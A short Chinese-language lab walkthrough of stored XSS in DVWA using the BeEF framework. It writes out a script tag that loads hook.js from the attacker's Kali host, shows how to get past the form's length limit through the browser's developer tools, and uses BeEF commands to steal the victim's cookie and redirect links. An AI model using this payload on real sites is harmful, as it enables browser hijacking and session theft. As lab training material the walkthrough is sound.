OWASP-XSS跨站脚本攻击之Beef
打开靶机,进入dvwa,选择xss stored(存储型)
进入kali,打开beef
kali会自动打开web ui,登录beef beef/beef
查看kali ip
dvwa中用script 引用kali中的hook.js文件,message框中有长度限制,F12更改长度限制
更改长度为200,填入完整script信息
<script src="http://192.168.228.128:3000/hook.js"></script>
提交,beef中发现目标浏览器
点击commands
命令颜色:
绿色:对目标主机生效并且不会被发现
橙色:对目标主机生效但可能被发现
灰色:对目标主机不一定生效
红色:对目标主机不生效
命令的使用:
get cookie:
点击get cookie,点击执行
生成了一条信息,可以看到目标cookie
replace hrefs:替换所有的链接
点击执行后,在页面点任意链接都跳转到了百度
beef功能非常强大,除了cmd,还有其他功能